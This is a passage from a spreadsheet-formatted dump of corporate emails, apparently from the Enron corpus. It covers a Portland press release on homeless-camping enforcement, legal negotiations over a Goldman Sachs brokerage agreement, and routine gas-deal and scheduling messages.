purchase of the Fountain Place apartment building and the recent opening of_x000D_
Ritzdorf Court which completed the Shelter Reconfiguration Plan.  The_x000D_
Fountain Place acquisition -- completed just last Friday, means the city_x000D_
will save the building's affordable housing rates, and serve as potential_x000D_
replacement housing for nearby low-income units soon to be lost._x000D_
_x000D_
Additionally, Katz and Sten also announced an expanded partnership with JOIN_x000D_
-- an outreach group that works to connect the homeless with services._x000D_
_x000D_
The Bureau of Housing and Community Development plans to increase JOIN's_x000D_
current contract with the bureau to a total of $90,000.  This money,_x000D_
combined with a new $80,000 contribution from the Portland Police Bureau,_x000D_
will increase the number of JOIN outreach workers, enabling them to work in_x000D_
every precinct to link homeless people with housing assistance resources._x000D_
_x000D_
"It is critical that we find ways for all of us to work together to help_x000D_
homeless people find their way off the streets -- that means our outreach_x000D_
workers, police, ODOT, and neighbors all collaborating to make that happen,"_x000D_
said Rob Justus, Executive Director, JOIN.  "Our ultimate goal is to respond_x000D_
to homelessness and address the negative effect of hundreds on the streets_x000D_
by helping people into housing.  By engaging the homeless people where they_x000D_
are -- whether it's under a bridge or in an alleyway -- our outreach workers_x000D_
can help them begin that transition off the streets."_x000D_
_x000D_
At the same time, Katz and Sten said that the City's aggressive efforts to_x000D_
preserve and create affordable housing opportunities and to link homeless_x000D_
individuals to those opportunities, made it all the more reasonable to_x000D_
continue to enforce the City's anti-camping policy which prevents unsafe and_x000D_
unhealthy campsites from degrading neighborhood livability.  Both said they_x000D_
are pleased the Multnomah County District Attorney has decided to appeal_x000D_
Judge Stephen Gallagher's opinion that the City's Homeless Camping Ordinance_x000D_
is unconstitutional._x000D_
_x000D_
While the City Attorney's Office and DA's Office continue to analyze the_x000D_
implications of the Gallagher opinion, Portland Police Bureau Assistant_x000D_
Chief Bruce Prunk outlined alternative tools the City intends to use to_x000D_
continue its efforts to restrict homeless camping in public areas._x000D_
_x000D_
1. Parks -- City Code closes most City parks between midnight and 5_x000D_
a.m., others, such as Forest Park, close earlier.  After closure, people_x000D_
camping would be subject to state law prohibition on criminal trespass in_x000D_
the second degree, and police could issue citations and/or remove people for_x000D_
trespassing.  The City also has the ability to exclude people from City_x000D_
parks for a period of not more than 30 days.  Permanent or temporary_x000D_
structures or facilities are also prohibited by City Code at all times, so_x000D_
police could issue citations or remove people violating the ordinance as an_x000D_
unclassified misdemeanor._x000D_
_x000D_
2. Highway Overpasses -- Oregon Department of Transportation property_x000D_
under I-5 and I-405 overpasses are posted with "No Trespassing" signs, which_x000D_
means police could issue citations to anyone camping at those locations._x000D_
_x000D_
3. Sidewalks -- There are provisions of the City Code that prohibit_x000D_
sidewalk obstructions._x000D_
_x000D_
4. Parking -- City Code prohibits parking a recreational vehicle in the_x000D_
public right of way directly across from a residential, public park, church_x000D_
or school property unless the vehicle is being loaded and unloaded for a_x000D_
period not to exceed eight hours.  In addition, no vehicle may park on the_x000D_
public right of way or other public property in excess of 24 hours without_x000D_
City permission.  If so, the vehicle may be removed._x000D_
_x000D_
Prunk said the Police Bureau would continue to work with the partners_x000D_
currently in place, such as JOIN, noting that recent efforts have focused_x000D_
less on anti-camping citations, and more on trespassing violations._x000D_
_x000D_
_x000D_
To read Mayor Katz's comments from the news conference, go to_x000D_
http://www.ci.portland.or.us/mayor/speeches/2/homelessaffordablespc.htm_x000D_
_x000D_
To read The Oregonian's editorial on this subject, see the following link_x000D_
http://www.oregonlive.com/oped/index.ssf?/oped/00/10/ed_11ldh1001.frame_x000D_
_x000D_
* * * * * * * *_x000D_
_x000D_
DEADLINE EXTENDED FOR PORTLAND UTILITIES REVIEW BOARD (PURB) BUSINESS,_x000D_
NEIGHBORHOOD REPRESENTATIVES_x000D_
_x000D_
_x000D_
Because of multiple vacancies, the City of Portland's Portland Utilities_x000D_
Review Board (PURB) is still looking for qualified members and has extended_x000D_
its deadline for applications.  Positions are available for neighborhood_x000D_
representation, public interest advocacy, large commercial/industrial_x000D_
businesses, and local businesses._x000D_
_x000D_
Members must reside or have a business located in Portland.  The_x000D_
appointments to these vacancies will serve three-year terms.  The deadline_x000D_
for applying to fill these vacancies has been extended to October 31, 2000._x000D_
_x000D_
The 15-member committee, established in November 1994, is appointed by Mayor_x000D_
Vera Katz to provide citizen oversight and independent and representative_x000D_
customer review of water, sewer and solid waste financial plans and rates._x000D_
PURB operates in an advisory capacity to City Council.  PURB meets monthly,_x000D_
with each Board member serving on one of three standing committees covering_x000D_
water, sewer or solid waste issues._x000D_
_x000D_
For more information on the responsibilities and time commitments each_x000D_
position requires, please contact David Hasson in the Office of Management_x000D_
and Finance at 503-823-6846._x000D_
_x000D_
Interested citizens can obtain an application for the positions by going to_x000D_
Mayor Vera Katz's website at http://www.ci.portland.or.us/mayor under_x000D_
"Citizen Involvement," or by calling the Office of Neighborhood Involvement_x000D_
at 503-823-4519._x000D_
_x000D_
_x000D_
For more background on PURB, see the section of the Katz website on_x000D_
Government Efficiency at_x000D_
http://www.ci.portland.or.us/mayorstate/section4.htm_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 May 2001 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'beustis@romcapital.com'})</t>
  </si>
  <si>
    <t>Cliff Baxter</t>
  </si>
  <si>
    <t>Dear Greg:_x000D_
I met you briefly about six weeks ago in Cliff's office - I was leaving as_x000D_
you were coming in._x000D_
_x000D_
I am an executive recruiter with Management and Capital Partners. I have_x000D_
done a great deal of work in the energy industry - I will send you some_x000D_
information on me and my company via FedEx ._x000D_
_x000D_
I will be in Houston May 30 - June 1 and would love the opportunity to sit_x000D_
down with you for a few  minutes. I will call your office later in the week_x000D_
to set up an appointment._x000D_
_x000D_
Cheers,_x000D_
Barbara_x000D_
_x000D_
Barbara Eustis_x000D_
Principal_x000D_
Management and Capital Partners_x000D_
805 Third Avenue_x000D_
New York, NY 10022_x000D_
office: 646-735-8872_x000D_
fax: 646-735-8888_x000D_
cell:  914-419-6590_x000D_
beustis@romcapital.com_x000D_
_x000D_
_x000D_
 - Barbara Eustis.vcf</t>
  </si>
  <si>
    <t>Fri, 10 Sep 1999 11:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pla@marval.com.ar'})</t>
  </si>
  <si>
    <t>RV: memo on derivatives</t>
  </si>
  <si>
    <t>&gt;   See attached._x000D_
&gt;_x000D_
&gt;_x000D_
---------------------------------------------------------------------_x000D_
Este mensaje es confidencial. Puede contener informacion amparada_x000D_
por el secreto profesional. Si usted ha recibido este e-mail por error,_x000D_
por favor comuniquenoslo inmediatamente via e-mail y tenga la_x000D_
amabilidad de eliminarlo de su sistema; no debera copiar el mensaje_x000D_
ni divulgar su contenido a ninguna persona. Muchas gracias._x000D_
_x000D_
This message is confidential. It may also contain information that is_x000D_
privileged or otherwise legally exempt from disclosure. If you have_x000D_
received it by mistake please let us know by e-mail immediately and_x000D_
delete it from your system; should also not copy the message nor_x000D_
disclose its contents to anyone. Many thanks._x000D_
 ---------------------------------------------------------------------_x000D_
_x000D_
_x000D_
_x000D_
 - att1.unk</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 10:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Plan to Rebuild the Business</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, I appreciate your help in these matters.  We need to be accurate and _x000D_
manage our risk but we can't "land the plane" or kill current and future deal _x000D_
velocity in the process.  Let me know how I can help._x000D_
_x000D_
Thanks much_x000D_
Dave_x000D_
---------------------- Forwarded by David W Delainey/HOU/EES on 05/11/2001 _x000D_
05:54 PM ---------------------------_x000D_
From: Mark E Haedicke@ECT on 05/11/2001 05:46 PM_x000D_
To: Vicki Sharp/HOU/EES@EES_x000D_
cc:  (bcc: David W Delainey/HOU/EES)_x000D_
Subject: Plan to Rebuild the Business_x000D_
_x000D_
Here are my thoughts so far:_x000D_
_x000D_
1.  Initial Legal Team -- Jeff Hodge, Jim Keller, Carol St. Clair, Aaron _x000D_
Rothwarg_x000D_
_x000D_
2.  Spot Check the Forms -- over the next week_x000D_
_x000D_
3.  Conform Forms to ENA Forms -- over next two months_x000D_
_x000D_
4.  Develop Form Approval Process -- dual approvals by EES and ENA_x000D_
_x000D_
5.  Develop Deal Approval Process -- deals above a certain size (or material _x000D_
variations from the form) would require concurrent EWS approval_x000D_
_x000D_
6.  Request List of Major Contract Concerns from Traders -- items that cannot _x000D_
be hedged_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Sep 2001 06:33:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>Dear Sara_x000D_
_x000D_
I am responding to you whilst Daniel Harris is out of the office._x000D_
_x000D_
In reference to Arbitration, we can agree to Arbitration in the English_x000D_
Courts._x000D_
_x000D_
Daniel will contact you tomorrow in reference to the remaining points._x000D_
_x000D_
I look forward to receiving the outstanding documentation._x000D_
_x000D_
Kind regards_x000D_
Talya Gordon_x000D_
_x000D_
-----Original Message-----_x000D_
From: Shackleton, Sara [mailto:Sara.Shackleton@ENRON.com]_x000D_
Sent: 17 September 2001 23:51_x000D_
To: "Harris, Daniel" &lt;Daniel.Harris@gs.com&gt;@ENRON_x000D_
Cc: kara.saxon@gs.com; Heard, Marie; talya.gordon@gs.com; Glover, Sheila_x000D_
Subject: RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
International_x000D_
_x000D_
_x000D_
Daniel:_x000D_
_x000D_
Thank you for your response.  Unfortunately, the outstanding issues_x000D_
relating to the Terms of Business Letter impact our corporate policy._x000D_
If you insist upon arbitration, it should be at either party's option_x000D_
and we can agree to arbitrate in accordance with the International_x000D_
Chamber of Commerce Rules.  Also, as you mentioned below, there may be_x000D_
non-prime brokerage issues that relate to the terms of business and,_x000D_
therefore, are not adequately addressed in the terms of business letter._x000D_
We do have other business relationships with GSI and again request_x000D_
inclusion of limitation of liability language in the terms of business_x000D_
letter.  I propose:_x000D_
_x000D_
"Neither party shall have any liability arising from this Letter or from_x000D_
any obligations which relate to this Letter for any indirect, special,_x000D_
punitive, exemplary, incidental or consequential loss or damage."_x000D_
_x000D_
Please reconsider the foregoing with explanation.  I will be out of the_x000D_
office 9/18/01 in the a.m._x000D_
_x000D_
All remaining documents have been completed and we will have them_x000D_
executed together with the terms of business letter._x000D_
_x000D_
Regards.  Sara_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From: 	"Harris, Daniel" &lt;Daniel.Harris@gs.com&gt;@ENRON_x000D_
&gt; [mailto:IMCEANOTES-+22Harris+2C+20Daniel+22+20+3CDaniel+2EHarris+40gs+_x000D_
&gt; 2Ecom+3E+40ENRON@ENRON.com]_x000D_
&gt; Sent:	Tuesday, September 11, 2001 3:15 AM_x000D_
&gt; To:	Shackleton, Sara_x000D_
&gt; Subject:	RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt; International_x000D_
&gt;_x000D_
&gt; Sara_x000D_
&gt;_x000D_
&gt; The terms of business are GSI's general terms and span your_x000D_
&gt; relationship_x000D_
&gt; with GSI generally. There may be non-prime brokerage issues that_x000D_
&gt; relate to_x000D_
&gt; the terms of business. Not everything in the TOBs intersects with the_x000D_
&gt; PB_x000D_
&gt; relationship, certainly if you do other business with GSI._x000D_
&gt;_x000D_
&gt; Re the liability provision, I think your concerns are adequately_x000D_
&gt; addressed_x000D_
&gt; in the documentation as drafted._x000D_
&gt;_x000D_
&gt; I would be grateful if you would come back to me as soon as possible_x000D_
&gt; so we_x000D_
&gt; can try to get this wrapped up today._x000D_
&gt;_x000D_
&gt; Kind regards_x000D_
&gt;_x000D_
&gt; Daniel_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Sara.Shackleton@enron.com [mailto:Sara.Shackleton@enron.com]_x000D_
&gt; Sent: 10 September 2001 21:02_x000D_
&gt; To: Daniel.Harris@gs.com_x000D_
&gt; Subject: RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt; International_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Daniel:_x000D_
&gt;_x000D_
&gt; Thanks for the message.  It seems to me that the terms of the PB_x000D_
&gt; conflict_x000D_
&gt; because J14 conflicts with A3, that is, (i)  J14 conflicts with Par.8_x000D_
&gt; requiring the conclusion that English courts will not apply to the_x000D_
&gt; Terms of_x000D_
&gt; Business agreement and (ii) A3 requires that English courts prevail._x000D_
&gt; Are_x000D_
&gt; you agreeing with this analysis?_x000D_
&gt;_x000D_
&gt; Also, there is nothing in the Terms of Business agreement to conflict_x000D_
&gt; with_x000D_
&gt; the limitation of liability language of the PB applicable to the PB_x000D_
&gt; (except_x000D_
&gt; for silence on the matter).  You didn't address this point.  It is_x000D_
&gt; Enron_x000D_
&gt; Corp. policy to include such language and I would like to limit the_x000D_
&gt; Terms_x000D_
&gt; of Business in the same manner._x000D_
&gt;_x000D_
&gt; Can you call me at 9 am Houston time on Tuesday, Sept. 11?  or suggest_x000D_
&gt; a_x000D_
&gt; different time?  I am not trying to belabor execution of the the_x000D_
&gt; remaining_x000D_
&gt; documents._x000D_
&gt;_x000D_
&gt; Thanks._x000D_
&gt;_x000D_
&gt; Sara Shackleton_x000D_
&gt; Enron Wholesale Services_x000D_
&gt; 1400 Smith Street, EB3801a_x000D_
&gt; Houston, TX  77002_x000D_
&gt; Ph:  (713) 853-5620_x000D_
&gt; Fax: (713) 646-3490_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   "Harris, Daniel" &lt;Daniel.Harris@gs.com&gt;@ENRON_x000D_
&gt;_x000D_
&gt; [mailto:IMCEANOTES-+22Harris+2C+20Daniel+22+20+3CDaniel+2EHarris+40gs+_x000D_
&gt; 2Ecom+_x000D_
&gt; 3E+40ENRON@ENRON.com]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Sent:   Monday, September 10, 2001 1:23 AM_x000D_
&gt;    To:     Shackleton, Sara_x000D_
&gt;    Cc:     Daniella.Bodman-Morris@gs.com; Heard, Marie_x000D_
&gt;    Subject:  RE: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt;              International_x000D_
&gt;_x000D_
&gt;    Sara_x000D_
&gt;    Actually, I believe we resolved these when we spoke. Arbitration -_x000D_
&gt; more_x000D_
&gt;    appropriate to general terms of business which principally_x000D_
&gt; contemplate_x000D_
&gt;    the_x000D_
&gt;    regulatory rules to which we are subject (SFA rules). In the event_x000D_
&gt; of_x000D_
&gt;    inconsistency, the terms of the PB agreement govern (clause A3)._x000D_
&gt;_x000D_
&gt;    I also amended the OSLA by side letter, which I sent over._x000D_
&gt;_x000D_
&gt;    Kind regards_x000D_
&gt;_x000D_
&gt;    Daniel_x000D_
&gt;_x000D_
&gt;    -----Original Message-----_x000D_
&gt;    From: Shackleton, Sara [mailto:Sara.Shackleton@ENRON.com]_x000D_
&gt;    Sent: 07 September 2001 20:45_x000D_
&gt;    To: Daniel.Harris@gs.com_x000D_
&gt;    Cc: Daniella.Bodman-Morris@gs.com; Heard, Marie_x000D_
&gt;    Subject: ECT Investments, Inc. account with Goldman Sachs_x000D_
&gt; International_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Daniel:_x000D_
&gt;_x000D_
&gt;    Thanks for finalizing the Prime Brokerage Agreement (the_x000D_
&gt; "Agreement")_x000D_
&gt;    with my colleague Angela Davis._x000D_
&gt;_x000D_
&gt;    I have two points with respect to the Terms of Business Letter_x000D_
&gt; relating_x000D_
&gt;    to the changes made to the Agreement which I believe we discussed_x000D_
&gt; but_x000D_
&gt;    were not in a position to resolve at the time.  These are:_x000D_
&gt;_x000D_
&gt;    (1)  Par. 8 Arbitration (which should conform to Clause J, Par. 14_x000D_
&gt; of_x000D_
&gt;    the Agreement).  I recall that we were discussing the possible use_x000D_
&gt; of_x000D_
&gt;    arbitration in the Agreement (and existence of arbitration in the_x000D_
&gt; OSLA)_x000D_
&gt;    so that we would not need to amend this particular paragraph of the_x000D_
&gt;    Terms of Business Letter.  Since we ultimately agreed to English_x000D_
&gt; courts,_x000D_
&gt;    I think we need to conform the Terms of Business Letter which will_x000D_
&gt;    prevail if in conflict with the Agreement._x000D_
&gt;_x000D_
&gt;    (2)  Par. 8 Arbitration (which should be limited in the same manner_x000D_
&gt; as_x000D_
&gt;    Clause J, Par. 11 as to limitation of liability).  I believe that_x000D_
&gt; you_x000D_
&gt;    and Angela agreed to the revisions in the Agreement.  Why shouldn't_x000D_
&gt;    these be mirrored in the Terms of Business Letter?_x000D_
&gt;_x000D_
&gt;    I look forward to hearing from you and completing the rest of the_x000D_
&gt;    account documentation.  Regards._x000D_
&gt;_x000D_
&gt;    Sara Shackleton_x000D_
&gt;    Enron Wholesale Services_x000D_
&gt;    1400 Smith Street, EB3801a_x000D_
&gt;    Houston, TX  77002_x000D_
&gt;    Ph:  (713) 853-5620_x000D_
&gt;    Fax: (713) 646-3490_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt;    This e-mail is the property of Enron Corp. and/or its relevant_x000D_
&gt; affiliate_x000D_
&gt;    and_x000D_
&gt;    may contain confidential and privileged material for the sole use_x000D_
&gt; of the_x000D_
&gt;    intended recipient (s). Any review, use, distribution or disclosure_x000D_
&gt; by_x000D_
&gt;    others is strictly prohibited. If you are not the intended_x000D_
&gt; recipient (or_x000D_
&gt;    authorized to receive for the recipient), please contact the sender_x000D_
&gt; or_x000D_
&gt;    reply_x000D_
&gt;    to Enron Corp. at enron.messaging.administration@enron.com and_x000D_
&gt; delete_x000D_
&gt;    all_x000D_
&gt;    copies of the message. This e-mail (and any attachments hereto) are_x000D_
&gt; not_x000D_
&gt;    intended to be an offer (or an acceptance) and do not create or_x000D_
&gt; evidence_x000D_
&gt;    a_x000D_
&gt;    binding and enforceable contract between Enron Corp. (or any of its_x000D_
&gt;    affiliates) and the intended recipient or any other party, and may_x000D_
&gt; not_x000D_
&gt;    be_x000D_
&gt;    relied on by anyone as the basis of a contract by estoppel or_x000D_
&gt; otherwise._x000D_
&gt;    Thank you._x000D_
&gt;_x000D_
&gt; **********************************************************************</t>
  </si>
  <si>
    <t>Wed, 8 Mar 2000 06:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vance.taylor@enron.com', 'daren.farmer@enron.com', "o'neal.winfree@enron.com", 'julie.meyers@enron.com'})</t>
  </si>
  <si>
    <t>Re: Midcoast Marketing</t>
  </si>
  <si>
    <t>The deals are in and the ticket numbers are Jan. 214249 and  Feb. 214251.</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 07:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Envera</t>
  </si>
  <si>
    <t xml:space="preserve">Bob, thanks for looking into this for us (Ted and Suresh, I had asked Bob to _x000D_
consider the various proposed relationships between DealBench and Envera from _x000D_
exchange and other legal perspectives given recent issues we have been _x000D_
considering on possible unrelated transactions involving somewhat similar _x000D_
issues)._x000D_
_x000D_
DealBench explicitly has declined to be involved in clearing/settlement _x000D_
through Envera of any transactions conducted on the DealBench site; the most _x000D_
DealBench will agree to do is make available hard copy of transaction _x000D_
information to Enron Global Markets (with Deal Manager's permission) and/or _x000D_
Deal Manager._x000D_
_x000D_
As to volume discounts, they are being offered on a per Envera member (as _x000D_
opposed to aggregate Envera member) basis based upon site usage (see latest _x000D_
version of relevant provision attached)._x000D_
_x000D_
Thanks again for your help._x000D_
_x000D_
Regards, NJD_x000D_
_x000D_
Nora J. Dobin_x000D_
Senior Counsel_x000D_
Enron Global Finance_x000D_
Enron Corp._x000D_
1400 Smith Street_x000D_
Houston, Texas  77002_x000D_
_x000D_
713/345-7723 (phone)_x000D_
713/853-9252 (fax)_x000D_
E-mail:  nora.dobin@enron.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	"Baird, Bob" &lt;RBaird@velaw.com&gt;_x000D_
	01/08/01 02:04 PM_x000D_
		 _x000D_
		 To: "Dobin, Nora (Enron)" &lt;nora.dobin@enron.com&gt;_x000D_
		 cc: "Harvey, Dean" &lt;dharvey@velaw.com&gt;, "Taylor, Mark (Enron)" _x000D_
&lt;mark.taylor@enron.com&gt;_x000D_
		 Subject: Envera_x000D_
_x000D_
I did look at the Envera documents, and I believe that they do not present_x000D_
any new or different issues for DealBench.  I am assuming that the Envera_x000D_
members will be using the DealBench platform for physical delivedry_x000D_
transactions.  The discounting and special rates are issues that I assume_x000D_
DealBench faces all the time, and I believe that there are no issues under_x000D_
the Robinson-Patman Act relating to that.  Under the Robinson-Patman Act it_x000D_
is ok to give volume discounts if they are justifiable, and I assume they_x000D_
would be in this case in light of the other considerations.  Also,_x000D_
Robinson-Patman only applies to "commodities" and the DealBench services_x000D_
that are being provided are most likely not commodities within the meaning_x000D_
of the Robinson-Patman Act.  I have spoken briefly with Alison Smith (one of_x000D_
our antitrust lawyers) about this, and she is going to take a quick look at_x000D_
those issues to make sure nothing has happened recently in this area that_x000D_
would be of concern.  _x000D_
_x000D_
It is my understanding that I was asked to look at this only from_x000D_
DealBench's standpoint.  There are some EnronOnline issues and issues under_x000D_
the business opportunity agreement provisions.  I have relayed comments on_x000D_
the latter to Phillips Nazro of our firm (who is working on the matter on_x000D_
Enron's behalf and asked me about them)._x000D_
_x000D_
I think that the EnronOnline issues ought to be obvious to Mark Taylor. Just_x000D_
in case, I am sending a copy of this to Mark, because I do think that Mark_x000D_
ought to focus on the words in Section 8.1 "if and to the extent that Enron_x000D_
can place a matching trade via Enron Online"  Does that language mean that_x000D_
Enron will be performing a clearing function?  If the answer is yes, there_x000D_
may be some questions that need to be answered under the Commodity Futures_x000D_
Modernization Act orf 2000, which I have not even attempted to answer.  I_x000D_
assume Mark is aware of this, but just in case I'm sending him a copy of_x000D_
this message._x000D_
_x000D_
Robert S. Baird_x000D_
Vinson &amp; Elkins L.L.P._x000D_
One American Center_x000D_
600 Congress_x000D_
Austin, Texas 78701_x000D_
Telephone: (512)495-8451_x000D_
When calling from Houston (713)758-2414_x000D_
Fax: (512)236-3210_x000D_
Email: rbaird@velaw.com_x000D_
Home telephone (512)347-8066_x000D_
Car phone: (512)627-8065_x000D_
Home fax: (512)347-8065_x000D_
Pager: 1-888-487-2651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t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 07:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Ogy</t>
  </si>
  <si>
    <t>I just made a couple of changes.  Would you send it to me again please?</t>
  </si>
  <si>
    <t>Tue, 19 Oct 1999 06:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andrea.bertone@enron.com', 'brent.hendry@enron.com', 'rick.hopkinson@enron.com', 'lynn.aven@enron.com'})</t>
  </si>
  <si>
    <t>Re: Financial Trading in Brazil</t>
  </si>
  <si>
    <t xml:space="preserve">I haven't reviewed yet but here it is!  Sara_x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 10/19/99 01:50 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"MBTOS - Marcelo Rodrigues" &lt;Mbtos@tozzini.com.br&gt; on 10/19/99 09:53:22 AM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc: Andrea Bertone@ENRON_DEVELOPMENT, Af@tozzini.com.br _x000D_
Subject: Re: Financial Trading in Brazil_x000D_
_x000D_
_x000D_
_x000D_
"S?o Paulo, October 19, 1999_x000D_
_x000D_
Dear Sara:_x000D_
_x000D_
Further to your E-mail below, please find attached hereto preliminary drafts _x000D_
of the memo and the comparative chart with respect to financial trading in _x000D_
Brazil. Please note that both the memorandum and the chart are still being _x000D_
revised by Antonio Felix who will return to you as soon as possible with a _x000D_
final version of the mentioned drafts._x000D_
_x000D_
Please find also attached hereto free translation of Brazilian SEC (CVM) _x000D_
Instruction 169, relating to eligibility of foreign investors under Annex IV _x000D_
mechanism._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Marcelo Rodrigues"_x000D_
_x000D_
&gt;&gt;&gt; "Sara Shackleton" &lt;sshackl@ect.enron.com&gt; 10/19 11:58 am &gt;&gt;&gt;_x000D_
_x000D_
_x000D_
AFAC - Thank you for your response.  It is difficult for me when I do not hear_x000D_
from you since I am not in Sao Paulo but I understand that you were engaged in_x000D_
other Enron matters.  I am looking forward to your response since the trading_x000D_
issues are not going away (the issues seem to only multiply).  Once "the Enron_x000D_
group" has had an opportunity to review, we would like to schedule another_x000D_
meeting with you and Marcelo in Sao Paulo.  I look forward to receiving the _x000D_
memo_x000D_
and chart.  Thank you and regards.  Sara_x000D_
_x000D_
P.S.  Please phone or e-mail when you are sending the memorandum._x000D_
_x000D_
_x000D_
_x000D_
 - Chart1.doc_x000D_
 - Memo4.doc_x000D_
 - Cvm169in.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 03:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'aimee.lannou@enron.com', 'julie.meyers@enron.com'})</t>
  </si>
  <si>
    <t>Re: Dec 2000 - meter 1351</t>
  </si>
  <si>
    <t xml:space="preserve">I have created deal 559843 to cover the flow for Nov 1 thru Jan 31.  This _x000D_
deal will probably be handled month-to-month from here on out._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
Aimee Lannou   01/05/2001 10:37 AM_x000D_
_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc: Edward Terry/HOU/ECT@ECT _x000D_
Subject: Dec 2000 - meter 1351_x000D_
_x000D_
Daren - There was flow at meter 1351 for Dec 2000.  It flowed every day, with _x000D_
an average flow of 151/day.  The last deal associated with this meter was _x000D_
274772 in October '00.  It also flowed in November with no nom, it is _x000D_
currently on stranger's gas.  Can you please take a look at this?  Thanks._x000D_
_x000D_
Aimee_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Jan 2002 04:36:32 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/21/02; HourAhead hour: 3;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002012103.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Thu, 14 Sep 2000 06:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'randy.petersen@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'paul.gregory@enron.com', 'dan.lyons@enron.com', 'christopher.helfrich@enron.com', 'richard.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Kafus Reconstruction</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Randy Petersen/HOU/ECT on 09/14/2000 _x000D_
01:50 PM ---------------------------_x000D_
_x000D_
_x000D_
"Mike Cunningham" &lt;mjc@chguk.com&gt; on 09/14/2000 11:59:03 AM_x000D_
To: &lt;randy.petersen@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Kafus Reconstruction_x000D_
_x000D_
_x000D_
_x000D_
Randy,_x000D_
?_x000D_
I attach a revised letter with a modified original  proposal and a proposal _x000D_
which is more in line with Ken's ambitions and  interests. I have no real _x000D_
beef either way._x000D_
?_x000D_
I would like to see Kafus redeem itself and to  repay it's investors. I would _x000D_
also value Enron being involved in International -  and over the next few _x000D_
years I think that would, in itself, allow Enron to recoup  its losses. _x000D_
?_x000D_
I confirm that, in International, I have no  interest in press releases or in _x000D_
the use of the Enron name to drum up capital or  investment._x000D_
?_x000D_
The attached papers are simply outlines. If you  agree the concept then I _x000D_
will work with you to bring one or the other to  fruition._x000D_
?_x000D_
Best regards,_x000D_
?_x000D_
Mike Cunningham_x000D_
 - Coach House-Kafus- restructuring plan-letter.doc_x000D_
 - Coach House-Kafus- restructuring plan-4.doc_x000D_
 - Coach House-Kafus- restructuring plan-5.doc_x000D_
</t>
  </si>
  <si>
    <t>Wed, 12 Jul 2000 08:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christine.stokes@enron.com', 'tk.lohman@enron.com', 'lorraine.lindberg@enron.com', 'mary.miller@enron.com', 'kevin.hyatt@enron.com', 'michele.lokay@enron.com', 'shelley.corman@enron.com', 'john.buchanan@enron.com', 'julia.white@enron.com', 'jeffery.fawcett@enron.com', 'sstojic@gbmdc.com', 'glen.hass@enron.com', 'steven.harris@enron.com', 'ramona.betancourt@enron.com', 'mary.darveaux@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>TW Capacity Options</t>
  </si>
  <si>
    <t xml:space="preserve">Attached for your review is a draft of Transport Options filing that _x000D_
incorporates the comments and suggestions I've received since last week.  _x000D_
Please provide any further suggestions/changes to me as soon as possible, but _x000D_
in no case later than close of business, Friday, July 14.  _x000D_
_x000D_
The timeline I've discussed with TW Commercial for this project is as follows:_x000D_
_x000D_
Final draft comments   Friday, July 14_x000D_
_x000D_
Circulate draft to customers,_x000D_
customer meetings, time for_x000D_
customers to respond, informal _x000D_
discussion with FERC   Mon. July 17 - Wed. July 26_x000D_
_x000D_
Final internal review/edit of filing  Thursday, July 27_x000D_
_x000D_
FERC filing    Monday, July 31_x000D_
_x000D_
Please let me know your comments on this proposed timeline as well.  Thank _x000D_
you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 28 Apr 2001 02:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bill.iii@enron.com', 'jeff.richter@enron.com', 'chris.foster@enron.com', "murray.o'neil@enron.com"})</t>
  </si>
  <si>
    <t>Interview schedule for Russell Mills: April 30, 2001</t>
  </si>
  <si>
